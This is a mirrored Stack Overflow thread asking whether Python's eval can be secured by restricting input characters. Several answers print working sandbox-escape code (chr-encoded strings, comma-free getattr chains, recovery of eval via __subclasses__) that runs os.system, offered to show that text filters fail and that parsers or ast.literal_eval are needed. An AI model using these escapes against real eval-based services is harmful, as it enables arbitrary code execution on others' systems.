Is there a way to secure strings for Python's eval?

后端 未结 7 2064
悲哀的现实
悲哀的现实 2021-02-08 07:43

There are many questions on SO about using Python\'s eval on insecure strings (eg.: Security of Python\'s eval() on untrusted strings?, Python: make eval safe).

相关标签:
7条回答
  • 2021-02-08 07:54

    It's not enough to create input sanitization routines. You must also ensure that sanitization is not once accidentally omitted. One way to do that is taint checking.

    0 讨论(0)
  • 2021-02-08 07:56

    Here you have a working "exploit" with your restrictions in place - only contains lower case ascii chars or any of the signs +-*/() . It relies on a 2nd eval layer.

    def mask_code( python_code ):
        s="+".join(["chr("+str(ord(i))+")" for i in python_code])
        return "eval("+s+")"
    
    bad_code='''__import__("os").getcwd()'''
    masked= mask_code( bad_code )
    print masked
    print eval(bad_code)
    

    output:

    eval(chr(111)+chr(115)+chr(46)+chr(103)+chr(101)+chr(116)+chr(99)+chr(119)+chr(100)+chr(40)+chr(41))
    /home/user
    

    This is a very trivial "exploit". I'm sure there's countless others, even with further character restrictions. It bears repeating that one should always use a parser or ast.literal_eval(). Only by parsing the tokens can one be sure the string is safe to evaluate. Anything else is betting against the house.

    0 讨论(0)
  • 2021-02-08 07:58

    Assuming the named functions exist and are safe:

    if re.match("^(?:safe|soft|cotton|ball|[()])+$", code): eval(code)
    
    0 讨论(0)
  • 2021-02-08 08:07

    To study how to make safe eval I suggest RestrictedPython module (over 10 years of production usage, one fine piece of Python software)

    http://pypi.python.org/pypi/RestrictedPython

    RestrictedPython takes Python source code and modifies its AST (Abstract Syntax Tree) to make the evaluation safe within the sandbox, without leaking any Python internals which might allow to escape the sandbox.

    From RestrictedPython source code you'll learn what kind of tricks are needed to perform to make Python sandboxed safe.

    0 讨论(0)
  • 2021-02-08 08:14

    An exploit similar to goncalopp's but that also satisfy the restriction that the string 'eval' is not a substring of the exploit:

    def to_chrs(text):
        return '+'.join('chr(%d)' % ord(c) for c in text)
    
    def _make_getattr_call(obj, attr):
        return 'getattr(*(list(%s for a in chr(1)) + list(%s for a in chr(1))))' % (obj, attr)
    
    def make_exploit(code):
        get = to_chrs('get')
        builtins = to_chrs('__builtins__')
        eval = to_chrs('eval')
        code = to_chrs(code)
        return (_make_getattr_call(
                    _make_getattr_call('globals()', '{get}') + '({builtins})',
                    '{eval}') + '({code})').format(**locals())
    

    It uses a combination of genexp and tuple unpacking to call getattr with two arguments without using the comma.

    An example usage:

    >>> exploit =  make_exploit('__import__("os").system("echo $PWD")')
    >>> print exploit
    getattr(*(list(getattr(*(list(globals() for a in chr(1)) + list(chr(103)+chr(101)+chr(116) for a in chr(1))))(chr(95)+chr(95)+chr(98)+chr(117)+chr(105)+chr(108)+chr(116)+chr(105)+chr(110)+chr(115)+chr(95)+chr(95)) for a in chr(1)) + list(chr(101)+chr(118)+chr(97)+chr(108) for a in chr(1))))(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(111)+chr(115)+chr(34)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(34)+chr(101)+chr(99)+chr(104)+chr(111)+chr(32)+chr(36)+chr(80)+chr(87)+chr(68)+chr(34)+chr(41))
    >>> eval(exploit)
    /home/giacomo
    0
    

    This proves that to define restrictions only on the text that make the code safe is really hard. Even things like 'eval' in code are not safe. Either you must remove the possibility of executing a function call at all, or you must remove all dangerous built-ins from eval's environment. My exploit also shows that getattr is as bad as eval even when you can not use the comma, since it allows you to walk arbitrary into the object hierarchy. For example you can obtain the real eval function even if the environment does not provide it:

    def real_eval():
        get_subclasses = _make_getattr_call(
                             _make_getattr_call(
                                 _make_getattr_call('()',
                                     to_chrs('__class__')),
                                 to_chrs('__base__')),
                             to_chrs('__subclasses__')) + '()'
    
        catch_warnings = 'next(c for c in %s if %s == %s)()' % (get_subclasses,
                                                                _make_getattr_call('c',
                                                                    to_chrs('__name__')),
                                                                to_chrs('catch_warnings'))
    
        return _make_getattr_call(
                   _make_getattr_call(
                       _make_getattr_call(catch_warnings, to_chrs('_module')),
                       to_chrs('__builtins__')),
                   to_chrs('get')) + '(%s)' % to_chrs('eval')
    
    
    >>> no_eval = __builtins__.__dict__.copy()
    >>> del no_eval['eval']
    >>> eval(real_eval(), {'__builtins__': no_eval})
    <built-in function eval>
    

    Even though if you remove all the built-ins, then the code becomes safe:

    >>> eval(real_eval(), {'__builtins__': None})
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "<string>", line 1, in <module>
    NameError: name 'getattr' is not defined
    

    Note that setting '__builtins__' to None removes also chr, list, tuple etc. The combo of your character restrinctions and '__builtins__' to None is completely safe, because the user has no way to access anything. He can't use the ., the brackets [] or any built-in function or type.

    Even though I must say in this way what you can evaluate is pretty limited. You can't do much more than do operations on numbers.

    Probably it's enough to remove eval, getattr, and chr from the built-ins to make the code safe, at least I can't think of a way to write an exploit that does not use one of them.

    A "parsing" approach is probably safer and gives more flexibility. For example this recipe is pretty good and is also easily customizable to add more restrictions.

    0 讨论(0)
  • 2021-02-08 08:16

    No, there isn't, or at least, not a sensible, truly secure way. Python is a highly dynamic language, and the flipside of that is that it's very easy to subvert any attempt to lock the language down.

    You either need to write your own parser for the subset you want, or use something existing, like ast.literal_eval(), for particular cases as you come across them. Use a tool designed for the job at hand, rather than trying to force an existing one to do the job you want, badly.

    Edit:

    An example of two strings, that, while fitting your description, if eval()ed in order, would execute arbitrary code (this particular example running evil.__method__().

    "from binascii import *"
    "eval(unhexlify('6576696c2e5f5f6d6574686f645f5f2829'))"
    
    0 讨论(0)
提交回复
热议问题